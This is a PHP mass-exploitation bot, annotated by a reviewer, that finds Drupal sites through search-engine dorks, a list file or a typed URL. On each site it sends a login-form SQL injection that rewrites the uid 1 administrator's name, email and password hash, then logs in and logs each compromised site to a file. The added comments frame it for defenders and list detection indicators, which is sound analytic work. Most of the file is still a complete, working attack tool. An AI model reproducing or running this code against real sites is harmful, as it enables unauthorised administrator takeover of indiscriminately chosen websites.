- <?php
// NOTE(review): defender-oriented annotations only; every code line below is unchanged.
// As far as this paste shows, the class builds a list of sites (search-engine
// scraping, a local list file, or one typed URL) and sends each one a
// login-form POST whose `name[...]` array KEY carries a SQL UPDATE against the
// users table for uid 1 (see exploiter()). The paste names no advisory; the
// request shape looks like the publicly documented Drupal 7 login-form SQL
// injection -- confirm against the Drupal security advisories. The mitigation
// is a patched Drupal core. A site that was reachable while unpatched should
// have uid 1 (name, mail, pass, status) and its other accounts reviewed rather
// than assumed clean.
- Class Drupal{
- //~CREATE BY PAKHAXOR - DRUPAL ADD ADMIN AUTO EXPLOIT (BOT)
// Indicator: account name written to uid 1 unless the operator edits this value.
- public $username = 'default'; // u can change username and default password admin
// Indicator: mail written to uid 1 (URL-encoded form of default@default.com).
- public $email = 'default%40default.com'; // encode to this web http://www.urlencoder.org/
- //how to run this tool ? using php namefile.php
// CurlPost($url, $post, $type): HTTP helper with two hard-coded client profiles.
//   $type == 1: POST with $post as the body, response headers included in the
//               returned string, Firefox/2.0.0.6 User-Agent.
//   $type == 2: plain request, or a POST built from the $post array when $post
//               is not false; MSIE 5.01 User-Agent; cookies saved to cookie.txt.
// Returns whatever curl_exec() returns; any other $type returns nothing.
// In this paste it is only called from SearchEngine() with $post = false, $type = 2.
- public function CurlPost($url, $post = false,$type=null){
- if($type == 1)
- {
- $ch = curl_init();
- curl_setopt ($ch, CURLOPT_URL, $url);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
- curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); // TLS certificate verification is switched off
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_POST, 1);
- $headers = array();
- $headers[] = 'Accept-Encoding: gzip, deflate';
- $headers[] = 'Content-Type: application/x-www-form-urlencoded';
- curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
- curl_setopt ($ch, CURLOPT_HEADER, 1);
- $result = curl_exec ($ch);
- curl_close($ch);
- return $result;
- }
- if($type == 2)
- {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); // TLS certificate and host-name checks are both switched off
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- if($post !== false){
- $isi = '';
- foreach($post as $key=>$value){
- $isi .= $key.'='.$value.'&';
- }
- rtrim($isi, '&');
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_POST, count($isi));
- curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
- curl_setopt($ch, CURLOPT_POSTFIELDS, $isi);
- }
- $data = curl_exec($ch);
- curl_close($ch);
- return $data;
- }
- }
// ReadStdin($prompt, $valid_inputs, $default): prints $prompt, reads one line
// from STDIN, trims and lower-cases it, and returns it. The unconditional
// `break` leaves the loop after the first read, so the $valid_inputs condition
// and the $default fallback are never applied to the returned value.
- public function ReadStdin($prompt, $valid_inputs=null, $default = '') {
- while(!isset($input) || (is_array($valid_inputs) && !in_array($input, $valid_inputs)) || ($valid_inputs == 'is_file' && !is_file($input))) {
- echo $prompt;
- $input = strtolower(trim(fgets(STDIN)));
- break;
- if(empty($input) && !empty($default)) {
- $input = $default;
- }
- }
- return $input;
- }
// NameXFile($file): compares the text between the first and second "." of
// $file with entries of a short extension list and returns true on a match;
// otherwise it falls off the end and returns nothing.
- public function NameXFile($file)
- {
- $validation = explode('.',$file);
- $ext = array("txt","log","lst");
- for($x=0;$x<count($ext);$x++)
- {
- if($validation[1] == $ext[$x++])
- {
- return true;
- }
- }
- }
// getDomain($keyword): not called anywhere in this paste. It reads $argv,
// which is not defined inside the method.
- public function getDomain($keyword)
- {
- if($keyword == 1)
- {
- return array($argv[1]);
- }
- }
// SearchEngine($dork, $angka): collects candidate sites from search results.
//   $angka == 1: Bing, result offsets 0..1000 in steps of 10.
//   $angka == 2: the same Bing query repeated for each country code in
//                $ccbing; every accepted host is also appended to domain.txt.
//   $angka == 3: Dogpile, offsets 1..1000 in steps of 10.
// Returns the de-duplicated list; any other $angka returns nothing.
// Defender note: selection is driven only by what a search engine has indexed
// for the operator's query, so a site is reached because it is indexed and
// matches, not because it was singled out.
- function SearchEngine($dork,$angka)
- {
- $list = array();
- if($angka == 1)
- {
- for($i=0;$i<=1000;$i+=10){
- $search = $this->CurlPost("http://www.bing.com/search?q=".urlencode($dork)."&first=".$i,false,2);
- preg_match_all('/<a href=\"?http:\/\/([^\"]*)\"/m', $search, $m);
- foreach($m[1] as $link){
- if(!preg_match("/live|msn|bing|microsoft/",$link)){ // drop links whose text contains the search engine's own names
- if(!in_array($link,$list)){
- $domain = $this->filterDomain($link);
- $list[] = "http://".$domain;
- }
- }
- }
- echo ".";
- }
- echo "\nDitemukan : ".count(array_unique($list))."\n";
- return array_unique($list);
- }
- if($angka == 2)
- {
- $ccbing = array("ca","br","be","nl","uk","it","es","de","no","dk","se","ch","ru","jp","cn","kr","mx","ar","cl","au");
- for($x=0;$x<=count($ccbing)-1;$x++){
- for($i=0;$i<=1000;$i+=10){
- $search = $this->CurlPost("http://www.bing.com/search?q=".urlencode($dork)."&cc=".$ccbing[$x]."&rf=1&first=".$i."&FORM=PORE",false,2);
- preg_match_all('/<a href=\"?http:\/\/([^\"]*)\"/m', $search, $m);
- foreach($m[1] as $link){
- if(!preg_match("/live|msn|bing|microsoft/",$link)){
- if(!in_array($link,$list)){
- $domain = $this->filterDomain($link);
- $fp = fopen("domain.txt", 'a+'); // local artifact: running list of harvested hosts
- fwrite($fp, "http://".$domain."\n");
- fclose($fp);
- $list[] = "http://".$domain;;
- }
- }
- }
- echo ".";
- }
- }
- echo "\nDitemukan : ".count(array_unique($list))."\n";
- return array_unique($list);
- }
- if($angka == 3)
- {
- for($x=1;$x<=1000;$x+=10){
- $check = $this->CurlPost('http://www.dogpile.com/dogpilecontrol/search/web?qsi='.$x.'&q='.$dork.'&fcoid=4&fcop=results-bottom&fpid=2',false,2);
- preg_match_all('# target="_blank">(.*?)</a>#',$check,$matches);
- foreach($matches[1] as $domain)
- {
- $domain = str_replace("<strong>", "", $domain);
- $domain = str_replace("</strong>", "", $domain);
- $list[] = $this->filterDomain($domain);
- }
- echo ".";
- }
- echo "\nDitemukan : ".count(array_unique($list))."\n";
- return array_unique($list);
- }
- }
// filterDomain($domains): reduces a URL or bare host string to a host name.
// Returns the host when "http://<host>" passes FILTER_VALIDATE_URL and the
// host contains at least one "."; otherwise returns nothing.
- public function filterDomain($domains)
- {
- $url = parse_url($domains);
- $target = (!isset($url["scheme"]) ? "http://".$domains : $url["scheme"]."://".$url["host"]);
- if(preg_match('/http/',$target))
- {
- $reparse = parse_url($target);
- $domain = (!isset($reparse["scheme"]) ? $target : $reparse["host"]);
- if (!filter_var("http://$domain", FILTER_VALIDATE_URL) === false)
- {
- if($domain !== "")
- {
- $checkdomain = explode('.',$domain);
- if(isset($checkdomain[1]))
- {
- return $domain;
- }
- }
- }
- }
- }
// wrongpress($read, $angka): menu guard. Prints "Wrong Press !!!" and ends the
// script when $read is unset, greater than $angka, or casts to integer 0.
// The last operand is an assignment (`=`), not a comparison.
- public function wrongpress($read,$angka)
- {
- if(!isset($read) or $read > $angka or !(int)($read) or $read = "")
- {
- echo "Wrong Press !!!";
- die();
- }
- }
// curl($url, $post): POST helper used by the top-level script for the follow-up
// login and password-reset requests. Sends $post as the body with a fixed
// Firefox/48.0 User-Agent, follows redirects, and returns curl_exec()'s result.
- public function curl($url,$post)
- {
- $ch = curl_init();
- curl_setopt ($ch, CURLOPT_URL, "$url");
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS,$post);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); // TLS certificate verification is switched off
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- $data = curl_exec($ch);
- curl_close($ch);
- return $data;
- }
// exploiter($url): sends the crafted login POST twice (to $url/user/login and
// to $url?q=node&destination=node) through file_get_contents() with a stream
// context. Returns true when the first response contains "edit-name" or the
// second contains the mb_strlen() warning text; otherwise false.
// The only header the context sets is Content-Type, and errors from both
// requests are silenced with @.
// Detection points visible in this method:
//   - POST bodies whose field names start with `name[0;` followed by SQL
//     (`update users set ...`), sent together with `name[]=Crap`, `pass=test`
//     and an empty `form_build_id`;
//   - the text "mb_strlen() expects parameter 1 to be string" in responses,
//     and presumably in the site's PHP/Drupal error log -- verify where your
//     deployment records warnings;
//   - uid 1 carrying the fixed pass hash that appears on the $post_data line.
// NOTE(review): "edit-name" is presumably the id of the login form's name
// field, so a true result does not by itself show that the UPDATE ran --
// confirm from the database, not from this tool's output.
- public function exploiter($url)
- {
- $post_data = "name[0;update users set name %3D '".$this->username."' , mail %3D '".$this->email."' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
- $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
- ", 'content' => $post_data));
- $ctx = stream_context_create($params);
- $addurl = array('/user/login','?q=node&destination=node');
- $data1 = @file_get_contents($url.$addurl[0], null, $ctx);
- $data2 = @file_get_contents($url.$addurl[1],null,$ctx);
- if(preg_match('/edit-name/',$data1))
- {
- return true;
- }elseif(stristr($data2, 'mb_strlen() expects parameter 1 to be string') && $data2){
- return true;
- }else{
- return false;
- }
- }
- }
// NOTE(review): defender-oriented annotations only; every code line below is unchanged.
// Top-level driver. It asks for a mode (1 = scrape a search engine, 2 = read a
// list file, 3 = one typed URL), builds $get, then walks every URL in it.
// Per URL the request sequence a web server would see is:
//   1. two crafted login POSTs from exploiter() ($url/user/login and
//      $url?q=node&destination=node);
//   2. a POST to $url/user/login with name=<username>, pass=admin and the fixed
//      form_build_id on the $post line -- sent for every URL, whatever
//      exploiter() returned;
//   3. only when exploiter() returned true, a POST to $url/user/password with
//      name=<email> and a second fixed form_build_id.
// The two hard-coded form_build_id strings and the back-to-back ordering are
// usable as log-search indicators. The password "admin" presumably corresponds
// to the hash exploiter() writes -- the paste does not state this.
- $drupal = new Drupal();
- $getdomains = $drupal->ReadStdin("[1] Making Dork\n[2] Making List\n[3] Making Url\nSelected : ", array('1','2','3'));
- $drupal->wrongpress($getdomains,3);
- if($getdomains == 1)
- {
- $dorker = $drupal->ReadStdin("[1] Bing\n[2] Bing By Country\n[3] Dogpile\nSelected : ",array("keyword"));
- if(isset($dorker))
- {
- $drupal->wrongpress($dorker,3);
- $url1 = $drupal->ReadStdin("Masukkan Dork : ",array("keyword"));
- echo "Grabbing : ";
- $get = $drupal->SearchEngine($url1,$dorker);
- }
- }
- if($getdomains == 2)
- {
- $url2 = $drupal->ReadStdin("Masukkan Namafile TXT : ",array("keyword"));
- $get =($drupal->NameXFile($url2) == true) ? file($url2) : die("Masukkan Nama File Dengan Benar !!!");
- }
- if($getdomains == 3)
- {
- $url3 = $drupal->ReadStdin("Masukkan url : ",array("keyword"));
- $get = array($url3);
- }
- $x=1;
- foreach($get as $url)
- {
- if($getdomains == 2)
- {
// Lines read with file() keep their line endings; strip them before use.
- $url = str_replace("\r", "", $url);
- $url = str_replace("\n", "", $url);
- }
- echo "++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
- $exploiter = $drupal->exploiter($url);
- $post = ('name='.$drupal->username.'&pass=admin&form_build_id=form-890Yt0ro4z3d4snrpn6DMNBIRaBjTAJrmnrrw6LIUNU&form_id=user_login&op=Log+in');
- $postlogin = $drupal->curl($url.'/user/login',$post);
- if($exploiter == true)
- {
- $sendemail = $drupal->curl("$url/user/password",'name='.$drupal->email.'&form_build_id=form-FZvl_8CktOoEYX_IccDyPsLGFgfrNLhdGlLR2pCCrAQ&form_id=user_pass&op=E-mail+new+password');
// A login response that still contains "edit-name" is treated as a failed login.
- if(preg_match('/edit-name/',$postlogin)) {
- $message = "[X] ".$url."/user/login => Can't Login\n";
- echo $message;
- if(preg_match('/messages error/',$sendemail))
- {
- echo "[X] ".$url."/user/password => Failed Send Email\n";
- }
- else{
- echo "[Y] ".$url."/user/password => Success Send Email\n";
- }
- }
- else{
- $message = "[Y] ".$url."/user/login => Success Login Username=".$drupal->username." Password=admin\n";
// Local artifact: drupalsuccess.txt accumulates one line per site the tool
// believes it logged in to, so it doubles as a victim list if recovered
// during an investigation.
- $fp = fopen("drupalsuccess.txt", 'a+');
- fwrite($fp, $message);
- fclose($fp);
- echo $message;
- }
- }
- else{
- echo $url.' => Not Vuln'."\n";
- }
- }